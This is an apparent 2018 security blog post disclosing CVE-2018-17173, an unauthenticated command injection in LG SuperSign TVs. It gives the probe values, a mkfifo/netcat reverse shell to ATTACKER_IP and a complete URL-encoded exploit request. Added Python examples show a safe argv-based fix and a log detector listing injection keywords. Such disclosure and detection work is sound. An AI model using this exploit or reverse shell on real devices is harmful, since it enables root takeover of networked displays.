Wednesday, September 19, 2018

LG SuperSign RCE! (to the 'luna' and back to shell)


Publishing the previous vulnerabilities in LG SuperSign TVs left a bad taste in my mouth, something like "I know there must be something more". So I continued with my research and finally found the precious RCE.

This vulnerability has been assigned CVE-2018-17173.

The vuln


Playing with the app through Burp, I saw a URL with several parameters. This URL is requested when the application needs to load the thumbnails of the images the user has uploaded.



So, I started to fuzz these parameters with ZAP until I found something interesting:



The application responded with the help screen of a utility called luna-send when the parameter sourceUri received the value "' or 1 --'". It looked like the server was building a command line that invoked this utility and the command was failing because of an unexpected parameter. Trimming the input down, I found that the value ' - was enough to get this response. I knew I was close.

If you see something like that in a response, you immediately start to play with things like ;command, ;command;, etc. After some failed attempts I tried ' -;reboot;' and watched the TV reboot... the RCE was knocking on my door.
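The post never shows the server-side code, so the following is an added illustration and not SuperSign's own code: the injection-prone pattern that the observed behaviour implies (untrusted sourceUri interpolated into a shell command line) next to the hardened form that passes the value as a single argv element with no shell involved, plus an allow-list check to apply before any command is built. `echo` stands in for luna-send, and the media root `/mnt/media/` is an assumed path, not a SuperSign one.

```python
import re
import subprocess

# Hypothetical stand-in for the thumbnail helper the TV really calls (luna-send).
# `echo` only reproduces the shape of the problem: how the argument reaches it.
STAND_IN_BINARY = "echo"

# Allow-list for a media path: absolute, safe characters only (constructed rule).
SAFE_URI_RE = re.compile(r"^/[A-Za-z0-9_./-]+$")


def run_unsafe(source_uri: str) -> str:
    """Vulnerable pattern: the value is pasted into a shell string inside single
    quotes. A single quote in the value closes the quoting, and whatever follows
    a ';' is executed by the shell as a separate command."""
    cmd = f"{STAND_IN_BINARY} '{source_uri}'"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def run_safe(source_uri: str) -> str:
    """Hardened pattern: argv list and no shell. The value arrives at the program
    as exactly one argument regardless of the metacharacters it contains."""
    result = subprocess.run(
        [STAND_IN_BINARY, source_uri], capture_output=True, text=True
    )
    return result.stdout


def validate_source_uri(source_uri: str, allowed_root: str = "/mnt/media/") -> bool:
    """Reject anything that is not a plain path under the expected media root
    before it gets anywhere near a command. allowed_root is an assumption."""
    if not SAFE_URI_RE.match(source_uri):
        return False
    if ".." in source_uri.split("/"):
        return False
    return source_uri.startswith(allowed_root)


if __name__ == "__main__":
    probe = "' -;echo INJECTED;'"  # same shape as the post's ' -;reboot;' probe
    print("unsafe:", repr(run_unsafe(probe)))   # INJECTED shows up as its own command
    print("safe:  ", repr(run_safe(probe)))     # the whole string is one argument
    print("valid: ", validate_source_uri("/mnt/media/photo1.jpg"), validate_source_uri(probe))
```

With the argv form the probe value is echoed back verbatim; with the shell form the text after the first `;` runs as a command of its own, which is exactly what the help-screen response and the reboot revealed on the TV. The allow-list is the cheaper fix for the specific parameter; the argv form is the general one.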

Getting a Shell

Taking advantage of the LFI from the previous post, I knew that the TV had netcat, but it was the netcat version that doesn't support the -e option (I downloaded the binary to check), so I used the alternative:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f

URL-encoded so it can be passed as a parameter:

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_IP%20PORT%20%3E%2Ftmp%2Ff


So, the payload was ready:


' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE_PORT%20%3E%2Ftmp%2Ff;'


Putting it all together:



http://LG_SuperSign_IP:9080/qsr_server/device/getThumbnail?sourceUri=%27%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE_PORT%20%3E%2Ftmp%2Ff;%27&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150
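Every stage of the request above leaves the same trace in a web-server access log: a GET to /qsr_server/device/getThumbnail whose decoded sourceUri contains shell metacharacters or the payload's keywords. The following detector is an added example, not part of the original post or of LG's software: it parses constructed common-log-format lines, percent-decodes the sourceUri value by hand (so a literal `;` in the query stays inside the value on every Python version) and grades each hit. The log lines, client addresses and severity levels are all constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not real SuperSign logs). Lines 2-4 carry
# the probe and injection shapes described in the post; lines 1 and 5 are benign.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Sep/2018:10:00:01 +0200] "GET /qsr_server/device/getThumbnail?sourceUri=%2Fmnt%2Fmedia%2Fphoto1.jpg&targetUri=%2Ftmp%2Fthumb%2Fphoto1.jpg&mediaType=image HTTP/1.1" 200 4120
192.0.2.10 - - [19/Sep/2018:10:00:02 +0200] "GET /qsr_server/device/getThumbnail?sourceUri=%27%20-&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image HTTP/1.1" 200 2311
198.51.100.7 - - [19/Sep/2018:10:00:03 +0200] "GET /qsr_server/device/getThumbnail?sourceUri=%27%20-%3Breboot%3B%27&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image HTTP/1.1" 500 0
198.51.100.7 - - [19/Sep/2018:10:00:04 +0200] "GET /qsr_server/device/getThumbnail?sourceUri=%27%20-;mkfifo%20%2Ftmp%2Ff%3B%27&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image HTTP/1.1" 200 0
203.0.113.5 - - [19/Sep/2018:10:00:05 +0200] "GET /index.html HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
VULNERABLE_PATH = "/qsr_server/device/getThumbnail"
# Characters that have no business in a media path and let input escape quoting.
SHELL_METACHARS = set("'\";|&$`\n")
# Keywords taken from the payload described in the post.
INJECTION_KEYWORDS = ("mkfifo", "/bin/sh", "nc ", "reboot")


def parse_query(query: str) -> Dict[str, str]:
    """Split only on '&' and percent-decode both sides. parse_qs on older Python
    also splits on ';', which would hide the very character we care about."""
    params: Dict[str, str] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def classify(source_uri: str) -> Optional[str]:
    """'high' for known payload keywords, 'medium' for bare shell metacharacters
    (the probing stage), None for a value that looks like a plain path."""
    if any(kw in source_uri for kw in INJECTION_KEYWORDS):
        return "high"
    if any(ch in SHELL_METACHARS for ch in source_uri):
        return "medium"
    return None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per getThumbnail request whose sourceUri is suspicious."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))  # urlsplit keeps ';' in the query
        if not parts.path.endswith(VULNERABLE_PATH):
            continue
        source_uri = parse_query(parts.query).get("sourceUri")
        if source_uri is None:
            continue
        severity = classify(source_uri)
        if severity:
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "severity": severity,
                "sourceUri": source_uri,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The medium grade matters as much as the high one: the `' -` probe that returned the luna-send help screen is the earliest point at which this activity is visible, well before any reboot or reverse shell. A real deployment would feed the decoded value into the same rule from a WAF or SIEM rather than from a flat file.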


I launched netcat to catch the shell, made the request and...


I was in.



In a few days I'll be updating this post with more technical details. 
That is all for now.


Points to take into account:

- No authentication required
- No privilege escalation needed (the app runs as root)